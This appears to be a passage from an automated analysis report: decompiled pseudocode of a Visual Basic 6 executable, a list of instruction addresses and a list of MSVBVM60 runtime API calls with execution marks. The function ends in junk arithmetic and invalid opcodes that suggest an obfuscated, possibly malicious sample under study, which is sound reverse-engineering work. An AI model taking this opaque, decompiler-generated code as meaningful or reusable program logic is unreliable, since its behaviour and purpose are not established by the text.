                        				asm("movsd");
                        				asm("movsd");
                        				 *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v200,  &_v204, 0x10,  &_v220,  &_v208,  &_v228);
                        				_v52 = _v228;
                        				L004012BA();
                        				L004012D8();
                        				_v196 =  *0x401158;
                        				_v180 = 0x4294bc;
                        				_v188 = 3;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_t642 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x10,  &_v196,  &_v220, 2,  &_v88,  &_v92);
                        				_v232 = _t642;
                        				if(_v232 >= 0) {
                        					_v324 = _v324 & 0x00000000;
                        				} else {
                        					_push(0x6f8);
                        					_push(0x40e54c);
                        					_push(_a4);
                        					_push(_v232);
                        					L004012C0();
                        					_v324 = _t642;
                        				}
                        				_v44 = _v220;
                        				_v40 = _v216;
                        				if( *0x412010 != 0) {
                        					_v328 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v328 = 0x412010;
                        				}
                        				_t648 =  &_v88;
                        				L004012CC();
                        				_v232 = _t648;
                        				_t652 =  *((intOrPtr*)( *_v232 + 0x70))(_v232,  &_v196, _t648,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x30c))( *_v328));
                        				asm("fclex");
                        				_v236 = _t652;
                        				if(_v236 >= 0) {
                        					_v332 = _v332 & 0x00000000;
                        				} else {
                        					_push(0x70);
                        					_push(0x40e6c4);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v332 = _t652;
                        				}
                        				if( *0x412010 != 0) {
                        					_v336 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v336 = 0x412010;
                        				}
                        				_t656 =  &_v92;
                        				L004012CC();
                        				_v240 = _t656;
                        				_t660 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v96, _t656,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x30c))( *_v336));
                        				asm("fclex");
                        				_v244 = _t660;
                        				if(_v244 >= 0) {
                        					_v340 = _v340 & 0x00000000;
                        				} else {
                        					_push(0x160);
                        					_push(0x40e6c4);
                        					_push(_v240);
                        					_push(_v244);
                        					L004012C0();
                        					_v340 = _t660;
                        				}
                        				_push(0);
                        				_push(0);
                        				_push(_v96);
                        				_push( &_v124);
                        				L004012B4();
                        				if( *0x412010 != 0) {
                        					_v344 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v344 = 0x412010;
                        				}
                        				_t665 =  &_v100;
                        				L004012CC();
                        				_v248 = _t665;
                        				_t669 =  *((intOrPtr*)( *_v248 + 0x58))(_v248,  &_v104, _t665,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x31c))( *_v344));
                        				asm("fclex");
                        				_v252 = _t669;
                        				if(_v252 >= 0) {
                        					_v348 = _v348 & 0x00000000;
                        				} else {
                        					_push(0x58);
                        					_push(0x40e6d4);
                        					_push(_v248);
                        					_push(_v252);
                        					L004012C0();
                        					_v348 = _t669;
                        				}
                        				if( *0x412010 != 0) {
                        					_v352 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v352 = 0x412010;
                        				}
                        				_t900 =  *((intOrPtr*)( *_v352));
                        				_t673 =  &_v108;
                        				L004012CC();
                        				_v256 = _t673;
                        				_t677 =  *((intOrPtr*)( *_v256 + 0x178))(_v256,  &_v192, _t673,  *((intOrPtr*)(_t900 + 0x2fc))( *_v352));
                        				asm("fclex");
                        				_v260 = _t677;
                        				if(_v260 >= 0) {
                        					_v356 = _v356 & 0x00000000;
                        				} else {
                        					_push(0x178);
                        					_push(0x40e6c4);
                        					_push(_v256);
                        					_push(_v260);
                        					L004012C0();
                        					_v356 = _t677;
                        				}
                        				_v180 = L"omregn";
                        				_v188 = 8;
                        				_v284 = _v104;
                        				_v104 = _v104 & 0x00000000;
                        				_v132 = _v284;
                        				_v140 = 9;
                        				_v208 = 0x33b88b;
                        				_t680 =  &_v124;
                        				L004012AE();
                        				_v204 = _t680;
                        				_v220 = 0xc70ba0d0;
                        				_v216 = 0x5af7;
                        				_v200 = _v196;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_v284 =  *0x401150;
                        				_v292 =  *0x401148;
                        				 *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v200,  &_v220, 0xd5a16240, 0x5af9,  &_v204, _t900,  &_v208, _t900, _t900, 0x10, 0x10, _v192,  &_v212, _t680);
                        				_v64 = _v212;
                        				_push( &_v96);
                        				_push( &_v108);
                        				_push( &_v100);
                        				_push( &_v92);
                        				_push( &_v88);
                        				_push(5);
                        				L004012BA();
                        				_push( &_v140);
                        				_push( &_v124);
                        				_push(2);
                        				L0040130E();
                        				if( *0x412010 != 0) {
                        					_v360 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v360 = 0x412010;
                        				}
                        				_t903 =  *((intOrPtr*)( *_v360));
                        				_t702 =  &_v88;
                        				L004012CC();
                        				_v232 = _t702;
                        				_t706 =  *((intOrPtr*)( *_v232 + 0x170))(_v232,  &_v72, _t702,  *((intOrPtr*)(_t903 + 0x2fc))( *_v360));
                        				asm("fclex");
                        				_v236 = _t706;
                        				if(_v236 >= 0) {
                        					_v364 = _v364 & 0x00000000;
                        				} else {
                        					_push(0x170);
                        					_push(0x40e6c4);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v364 = _t706;
                        				}
                        				_v220 =  *0x401140;
                        				_v288 = _v72;
                        				_v72 = _v72 & 0x00000000;
                        				_v116 = _v288;
                        				_v124 = 8;
                        				_v360 =  *0x401138;
                        				_t714 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v124, _t903, _t903,  &_v220, 0x5c48bed0, 0x5b07,  &_v196);
                        				_v240 = _t714;
                        				if(_v240 >= 0) {
                        					_v368 = _v368 & 0x00000000;
                        				} else {
                        					_push(0x6fc);
                        					_push(0x40e54c);
                        					_push(_a4);
                        					_push(_v240);
                        					L004012C0();
                        					_v368 = _t714;
                        				}
                        				_v60 = _v196;
                        				L004012A8();
                        				L004012D8();
                        				if( *0x412010 != 0) {
                        					_v372 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v372 = 0x412010;
                        				}
                        				_t719 =  &_v88;
                        				L004012CC();
                        				_v232 = _t719;
                        				_t723 =  *((intOrPtr*)( *_v232 + 0x160))(_v232,  &_v92, _t719,  *((intOrPtr*)( *((intOrPtr*)( *_v372)) + 0x2fc))( *_v372));
                        				asm("fclex");
                        				_v236 = _t723;
                        				if(_v236 >= 0) {
                        					_v376 = _v376 & 0x00000000;
                        				} else {
                        					_push(0x160);
                        					_push(0x40e6c4);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v376 = _t723;
                        				}
                        				_push(0);
                        				_push(0);
                        				_push(_v92);
                        				_push( &_v124);
                        				L004012B4();
                        				if( *0x412010 != 0) {
                        					_v380 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v380 = 0x412010;
                        				}
                        				_t728 =  &_v96;
                        				L004012CC();
                        				_v240 = _t728;
                        				_t732 =  *((intOrPtr*)( *_v240 + 0x120))(_v240,  &_v196, _t728,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x30c))( *_v380));
                        				asm("fclex");
                        				_v244 = _t732;
                        				if(_v244 >= 0) {
                        					_v384 = _v384 & 0x00000000;
                        				} else {
                        					_push(0x120);
                        					_push(0x40e6c4);
                        					_push(_v240);
                        					_push(_v244);
                        					L004012C0();
                        					_v384 = _t732;
                        				}
                        				if( *0x412010 != 0) {
                        					_v388 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v388 = 0x412010;
                        				}
                        				_t736 =  &_v100;
                        				L004012CC();
                        				_v248 = _t736;
                        				_t740 =  *((intOrPtr*)( *_v248 + 0x70))(_v248,  &_v200, _t736,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x318))( *_v388));
                        				asm("fclex");
                        				_v252 = _t740;
                        				if(_v252 >= 0) {
                        					_v392 = _v392 & 0x00000000;
                        				} else {
                        					_push(0x70);
                        					_push(0x40e6f8);
                        					_push(_v248);
                        					_push(_v252);
                        					L004012C0();
                        					_v392 = _t740;
                        				}
                        				_t915 =  &_v72;
                        				L004012A2();
                        				_v192 = 0x1bd4;
                        				_v180 = _v196;
                        				_v188 = 3;
                        				_v228 =  *0x401130;
                        				_v220 = 0x91e41cd0;
                        				_v216 = 0x5b05;
                        				_v432 =  *0x40112c;
                        				_v440 = _v200;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_t746 =  &_v124;
                        				L004012AE();
                        				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v220, _t746, _t746,  &_v228, 0x10,  &_v192, _t915,  &_v72, _t915);
                        				L00401314();
                        				_push( &_v92);
                        				_push( &_v100);
                        				_push( &_v96);
                        				_push( &_v88);
                        				_push(4);
                        				L004012BA();
                        				L004012D8();
                        				if( *0x412010 != 0) {
                        					_v396 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v396 = 0x412010;
                        				}
                        				_t758 =  &_v88;
                        				L004012CC();
                        				_v232 = _t758;
                        				_t762 =  *((intOrPtr*)( *_v232 + 0x198))(_v232,  &_v72, _t758,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x304))( *_v396));
                        				asm("fclex");
                        				_v236 = _t762;
                        				if(_v236 >= 0) {
                        					_v400 = _v400 & 0x00000000;
                        				} else {
                        					_push(0x198);
                        					_push(0x40e6b4);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v400 = _t762;
                        				}
                        				if( *0x412010 != 0) {
                        					_v404 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v404 = 0x412010;
                        				}
                        				_t766 =  &_v92;
                        				L004012CC();
                        				_v240 = _t766;
                        				_t770 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v96, _t766,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x300))( *_v404));
                        				asm("fclex");
                        				_v244 = _t770;
                        				if(_v244 >= 0) {
                        					_v408 = _v408 & 0x00000000;
                        				} else {
                        					_push(0x160);
                        					_push(0x40e6c4);
                        					_push(_v240);
                        					_push(_v244);
                        					L004012C0();
                        					_v408 = _t770;
                        				}
                        				if( *0x412010 != 0) {
                        					_v412 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v412 = 0x412010;
                        				}
                        				_t774 =  &_v100;
                        				L004012CC();
                        				_v248 = _t774;
                        				_t778 =  *((intOrPtr*)( *_v248 + 0x1c0))(_v248,  &_v196, _t774,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x304))( *_v412));
                        				asm("fclex");
                        				_v252 = _t778;
                        				if(_v252 >= 0) {
                        					_v416 = _v416 & 0x00000000;
                        				} else {
                        					_push(0x1c0);
                        					_push(0x40e6b4);
                        					_push(_v248);
                        					_push(_v252);
                        					L004012C0();
                        					_v416 = _t778;
                        				}
                        				_v180 = 0x7264c0;
                        				_v188 = 3;
                        				_v292 = _v96;
                        				_v96 = _v96 & 0x00000000;
                        				_v116 = _v292;
                        				_v124 = 9;
                        				_v220 = 0x4c1ab180;
                        				_v216 = 0x5b02;
                        				L004012A2();
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_t787 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v76, _v72,  &_v220,  &_v124, 0x10, _v196);
                        				_v256 = _t787;
                        				if(_v256 >= 0) {
                        					_v420 = _v420 & 0x00000000;
                        				} else {
                        					_push(0x700);
                        					_push(0x40e54c);
                        					_push(_a4);
                        					_push(_v256);
                        					L004012C0();
                        					_v420 = _t787;
                        				}
                        				_push( &_v72);
                        				_push( &_v76);
                        				_push(2);
                        				L0040129C();
                        				_push( &_v100);
                        				_push( &_v92);
                        				_push( &_v88);
                        				_push(3);
                        				L004012BA();
                        				L004012D8();
                        				if( *0x412010 != 0) {
                        					_v424 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v424 = 0x412010;
                        				}
                        				_t796 =  &_v88;
                        				L004012CC();
                        				_v232 = _t796;
                        				_t800 =  *((intOrPtr*)( *_v232 + 0x1dc))(_v232,  &_v72, _t796,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
                        				asm("fclex");
                        				_v236 = _t800;
                        				if(_v236 >= 0) {
                        					_v428 = _v428 & 0x00000000;
                        				} else {
                        					_push(0x1dc);
                        					_push(0x40e6f8);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v428 = _t800;
                        				}
                        				if( *0x412010 != 0) {
                        					_v432 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v432 = 0x412010;
                        				}
                        				_t804 =  &_v92;
                        				L004012CC();
                        				_v240 = _t804;
                        				_t808 =  *((intOrPtr*)( *_v240 + 0x130))(_v240,  &_v96, _t804,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x300))( *_v432));
                        				asm("fclex");
                        				_v244 = _t808;
                        				if(_v244 >= 0) {
                        					_v436 = _v436 & 0x00000000;
                        				} else {
                        					_push(0x130);
                        					_push(0x40e6c4);
                        					_push(_v240);
                        					_push(_v244);
                        					L004012C0();
                        					_v436 = _t808;
                        				}
                        				_push(0);
                        				_push(0);
                        				_push(_v96);
                        				_push( &_v140); // executed
                        				L004012B4(); // executed
                        				if( *0x412010 != 0) {
                        					_v440 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v440 = 0x412010;
                        				}
                        				_t813 =  &_v100;
                        				L004012CC();
                        				_v248 = _t813;
                        				_t817 =  *((intOrPtr*)( *_v248 + 0x198))(_v248,  &_v76, _t813,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x310))( *_v440));
                        				asm("fclex");
                        				_v252 = _t817;
                        				if(_v252 >= 0) {
                        					_v444 = _v444 & 0x00000000;
                        				} else {
                        					_push(0x198);
                        					_push(0x40e6f8);
                        					_push(_v248);
                        					_push(_v252);
                        					L004012C0();
                        					_v444 = _t817;
                        				}
                        				if( *0x412010 != 0) {
                        					_v448 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v448 = 0x412010;
                        				}
                        				_t821 =  &_v104;
                        				L004012CC();
                        				_v256 = _t821;
                        				_t825 =  *((intOrPtr*)( *_v256 + 0xf8))(_v256,  &_v80, _t821,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x314))( *_v448));
                        				asm("fclex");
                        				_v260 = _t825;
                        				if(_v260 >= 0) {
                        					_v452 = _v452 & 0x00000000;
                        				} else {
                        					_push(0xf8);
                        					_push(0x40e6f8);
                        					_push(_v256);
                        					_push(_v260);
                        					L004012C0();
                        					_v452 = _t825;
                        				}
                        				_v296 = _v80;
                        				_v80 = _v80 & 0x00000000;
                        				_v164 = _v296;
                        				_v172 = 8;
                        				_v192 = 0x375e;
                        				_v300 = _v76;
                        				_v76 = _v76 & 0x00000000;
                        				_v148 = _v300;
                        				_v156 = 8;
                        				_v304 = _v72;
                        				_v72 = _v72 & 0x00000000;
                        				_v116 = _v304;
                        				_v124 = 8;
                        				_v228 = 0x16c751a0;
                        				_v224 = 0x5b07;
                        				_v220 = 0x62c32930;
                        				_v216 = 0x5af3;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_t835 =  &_v140;
                        				L00401296();
                        				L00401320();
                        				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220,  &_v228,  &_v124, _t835, _t835,  &_v156, 0x2c9400,  &_v192, 0x10);
                        				_t942 =  &_v84;
                        				L00401314();
                        				L004012BA();
                        				L0040130E();
                        				_t853 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 4,  &_v124,  &_v140,  &_v156,  &_v172, 5,  &_v88,  &_v92,  &_v100,  &_v104,  &_v96);
                        				asm("fclex");
                        				_v232 = _t853;
                        				if(_v232 >= 0) {
                        					_v456 = _v456 & 0x00000000;
                        				} else {
                        					_push(0x2b4);
                        					_push(0x40e51c);
                        					_push(_a4);
                        					_push(_v232);
                        					L004012C0();
                        					_v456 = _t853;
                        				}
                        				_push(1);
                        				L00401290();
                        				_push(4);
                        				_push(0xffffffff);
                        				 *((intOrPtr*)(( *0x00401F24() & 0x00000041) + 0x70)) =  *((intOrPtr*)(( *0x00401F24() & 0x00000041) + 0x70)) + _t942;
                        				asm("out 0x40, eax");
                        				asm("invalid");
                        				goto _v611;
                        			}

                        0x0040fb01
                        0x0040fae6
                        0x0040fae6
                        0x0040faeb
                        0x0040faf0
                        0x0040faf5
                        0x0040faf5
                        0x0040fb1b
                        0x0040fb25
                        0x0040fb29
                        0x0040fb2e
                        0x0040fb46
                        0x0040fb4c
                        0x0040fb4e
                        0x0040fb5b
                        0x0040fb80
                        0x0040fb5d
                        0x0040fb5d
                        0x0040fb62
                        0x0040fb67
                        0x0040fb6d
                        0x0040fb73
                        0x0040fb78
                        0x0040fb78
                        0x0040fb8d
                        0x0040fb96
                        0x0040fb9c
                        0x0040fba6
                        0x0040fba9
                        0x0040fbd0
                        0x0040fbdf
                        0x0040fbe5
                        0x0040fbf2
                        0x0040fc14
                        0x0040fbf4
                        0x0040fbf4
                        0x0040fbf9
                        0x0040fbfe
                        0x0040fc01
                        0x0040fc07
                        0x0040fc0c
                        0x0040fc0c
                        0x0040fc21
                        0x0040fc27
                        0x0040fc2f
                        0x0040fc3b
                        0x0040fc58
                        0x0040fc3d
                        0x0040fc3d
                        0x0040fc42
                        0x0040fc47
                        0x0040fc4c
                        0x0040fc4c
                        0x0040fc7c
                        0x0040fc80
                        0x0040fc85
                        0x0040fc9d
                        0x0040fca3
                        0x0040fca5
                        0x0040fcb2
                        0x0040fcd7
                        0x0040fcb4
                        0x0040fcb4
                        0x0040fcb9
                        0x0040fcbe
                        0x0040fcc4
                        0x0040fcca
                        0x0040fccf
                        0x0040fccf
                        0x0040fcde
                        0x0040fce0
                        0x0040fce2
                        0x0040fce8
                        0x0040fce9
                        0x0040fcf8
                        0x0040fd15
                        0x0040fcfa
                        0x0040fcfa
                        0x0040fcff
                        0x0040fd04
                        0x0040fd09
                        0x0040fd09
                        0x0040fd39
                        0x0040fd3d
                        0x0040fd42
                        0x0040fd5d
                        0x0040fd63
                        0x0040fd65
                        0x0040fd72
                        0x0040fd97
                        0x0040fd74
                        0x0040fd74
                        0x0040fd79
                        0x0040fd7e
                        0x0040fd84
                        0x0040fd8a
                        0x0040fd8f
                        0x0040fd8f
                        0x0040fda5
                        0x0040fdc2
                        0x0040fda7
                        0x0040fda7
                        0x0040fdac
                        0x0040fdb1
                        0x0040fdb6
                        0x0040fdb6
                        0x0040fde6
                        0x0040fdea
                        0x0040fdef
                        0x0040fe0a
                        0x0040fe0d
                        0x0040fe0f
                        0x0040fe1c
                        0x0040fe3e
                        0x0040fe1e
                        0x0040fe1e
                        0x0040fe20
                        0x0040fe25
                        0x0040fe2b
                        0x0040fe31
                        0x0040fe36
                        0x0040fe36
                        0x0040fe4a
                        0x0040fe4d
                        0x0040fe52
                        0x0040fe61
                        0x0040fe67
                        0x0040fe77
                        0x0040fe7d
                        0x0040fe87
                        0x0040fe98
                        0x0040fea6
                        0x0040feb3
                        0x0040fec0
                        0x0040fec1
                        0x0040fec2
                        0x0040fec3
                        0x0040fecb
                        0x0040fecf
                        0x0040fee4
                        0x0040feed
                        0x0040fef5
                        0x0040fef9
                        0x0040fefd
                        0x0040ff01
                        0x0040ff02
                        0x0040ff04
                        0x0040ff0f
                        0x0040ff1b
                        0x0040ff38
                        0x0040ff1d
                        0x0040ff1d
                        0x0040ff22
                        0x0040ff27
                        0x0040ff2c
                        0x0040ff2c
                        0x0040ff5c
                        0x0040ff60
                        0x0040ff65
                        0x0040ff7d
                        0x0040ff83
                        0x0040ff85
                        0x0040ff92
                        0x0040ffb7
                        0x0040ff94
                        0x0040ff94
                        0x0040ff99
                        0x0040ff9e
                        0x0040ffa4
                        0x0040ffaa
                        0x0040ffaf
                        0x0040ffaf
                        0x0040ffc5
                        0x0040ffe2
                        0x0040ffc7
                        0x0040ffc7
                        0x0040ffcc
                        0x0040ffd1
                        0x0040ffd6
                        0x0040ffd6
                        0x00410006
                        0x0041000a
                        0x0041000f
                        0x00410027
                        0x0041002d
                        0x0041002f
                        0x0041003c
                        0x00410061
                        0x0041003e
                        0x0041003e
                        0x00410043
                        0x00410048
                        0x0041004e
                        0x00410054
                        0x00410059
                        0x00410059
                        0x0041006f
                        0x0041008c
                        0x00410071
                        0x00410071
                        0x00410076
                        0x0041007b
                        0x00410080
                        0x00410080
                        0x004100b0
                        0x004100b4
                        0x004100b9
                        0x004100d4
                        0x004100da
                        0x004100dc
                        0x004100e9
                        0x0041010e
                        0x004100eb
                        0x004100eb
                        0x004100f0
                        0x004100f5
                        0x004100fb
                        0x00410101
                        0x00410106
                        0x00410106
                        0x00410115
                        0x0041011f
                        0x0041012c
                        0x00410132
                        0x0041013c
                        0x0041013f
                        0x00410146
                        0x00410150
                        0x00410162
                        0x00410170
                        0x0041017d
                        0x0041017e
                        0x0041017f
                        0x00410180
                        0x0041019b
                        0x004101a1
                        0x004101ae
                        0x004101d0
                        0x004101b0
                        0x004101b0
                        0x004101b5
                        0x004101ba
                        0x004101bd
                        0x004101c3
                        0x004101c8
                        0x004101c8
                        0x004101da
                        0x004101de
                        0x004101df
                        0x004101e1
                        0x004101ec
                        0x004101f0
                        0x004101f4
                        0x004101f5
                        0x004101f7
                        0x00410202
                        0x0041020e
                        0x0041022b
                        0x00410210
                        0x00410210
                        0x00410215
                        0x0041021a
                        0x0041021f
                        0x0041021f
                        0x0041024f
                        0x00410253
                        0x00410258
                        0x00410270
                        0x00410276
                        0x00410278
                        0x00410285
                        0x004102aa
                        0x00410287
                        0x00410287
                        0x0041028c
                        0x00410291
                        0x00410297
                        0x0041029d
                        0x004102a2
                        0x004102a2
                        0x004102b8
                        0x004102d5
                        0x004102ba
                        0x004102ba
                        0x004102bf
                        0x004102c4
                        0x004102c9
                        0x004102c9
                        0x004102f9
                        0x004102fd
                        0x00410302
                        0x0041031a
                        0x00410320
                        0x00410322
                        0x0041032f
                        0x00410354
                        0x00410331
                        0x00410331
                        0x00410336
                        0x0041033b
                        0x00410341
                        0x00410347
                        0x0041034c
                        0x0041034c
                        0x0041035b
                        0x0041035d
                        0x0041035f
                        0x00410368
                        0x00410369
                        0x00410378
                        0x00410395
                        0x0041037a
                        0x0041037a
                        0x0041037f
                        0x00410384
                        0x00410389
                        0x00410389
                        0x004103b9
                        0x004103bd
                        0x004103c2
                        0x004103da
                        0x004103e0
                        0x004103e2
                        0x004103ef
                        0x00410414
                        0x004103f1
                        0x004103f1
                        0x004103f6
                        0x004103fb
                        0x00410401
                        0x00410407
                        0x0041040c
                        0x0041040c
                        0x00410422
                        0x0041043f
                        0x00410424
                        0x00410424
                        0x00410429
                        0x0041042e
                        0x00410433
                        0x00410433
                        0x00410463
                        0x00410467
                        0x0041046c
                        0x00410484
                        0x0041048a
                        0x0041048c
                        0x00410499
                        0x004104be
                        0x0041049b
                        0x0041049b
                        0x004104a0
                        0x004104a5
                        0x004104ab
                        0x004104b1
                        0x004104b6
                        0x004104b6
                        0x004104c8
                        0x004104ce
                        0x004104d8
                        0x004104de
                        0x004104e8
                        0x004104f4
                        0x004104fa
                        0x00410504
                        0x0041050a
                        0x00410517
                        0x0041051d
                        0x00410527
                        0x0041052a
                        0x00410531
                        0x0041053b
                        0x00410545
                        0x0041054f
                        0x0041055c
                        0x00410569
                        0x0041056a
                        0x0041056b
                        0x0041056c
                        0x00410580
                        0x00410587
                        0x00410591
                        0x004105b1
                        0x004105b7
                        0x004105ba
                        0x004105d5
                        0x004105f8
                        0x00410608
                        0x0041060e
                        0x00410610
                        0x0041061d
                        0x0041063f
                        0x0041061f
                        0x0041061f
                        0x00410624
                        0x00410629
                        0x0041062c
                        0x00410632
                        0x00410637
                        0x00410637
                        0x00410646
                        0x00410648
                        0x00410652
                        0x00410654
                        0x00410661
                        0x00410664
                        0x0041066f
                        0x00410671

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 0040F292
                        • __vbaStrCat.MSVBVM60(0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2E8
                        • __vbaStrMove.MSVBVM60(0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2F2
                        • #711.MSVBVM60(?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F2FF
                        • __vbaAryVar.MSVBVM60(00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F310
                        • __vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F326
                        • __vbaFreeStr.MSVBVM60(?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F32E
                        • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00000000,0040E6B0,0040E6A8,0000000A,000000FF,00000000), ref: 0040F340
                        • __vbaDerefAry1.MSVBVM60(?,00000000,?,?,004011D6), ref: 0040F34D
                        • __vbaStrCmp.MSVBVM60(0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F359
                        • #610.MSVBVM60(?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F36A
                        • __vbaStrVarVal.MSVBVM60(?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F377
                        • #540.MSVBVM60(?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F384
                        • #610.MSVBVM60(?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F390
                        • __vbaVarTstEq.MSVBVM60(?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F3A3
                        • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F3B2
                        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,?,?,?,0040E6A8,00000000,?,00000000), ref: 0040F3CB
                        • __vbaVarDup.MSVBVM60 ref: 0040F3FA
                        • #562.MSVBVM60(?), ref: 0040F403
                        • __vbaFreeVar.MSVBVM60(?), ref: 0040F41E
                        • #704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F445
                        • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F44F
                        • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?), ref: 0040F457
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,0040E6A8,00000000,?,00000000,?,?,004011D6), ref: 0040F46F
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F4A8
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,000000A0), ref: 0040F4F2
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F519
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F552
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000080), ref: 0040F59F
                        • __vbaChkstk.MSVBVM60(F09E01C0,?,?), ref: 0040F61C
                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040F659
                        • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,?,004011D6), ref: 0040F664
                        • __vbaChkstk.MSVBVM60(?,?), ref: 0040F69A
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,000006F8), ref: 0040F6DB
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F714
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F74D
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E6C4,00000070), ref: 0040F794
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F7BB
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F7F4
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160), ref: 0040F83E
                        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F85D
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,00000000,?,00000000,?,?,004011D6), ref: 0040F878
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F8B1
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6D4,00000058), ref: 0040F8F5
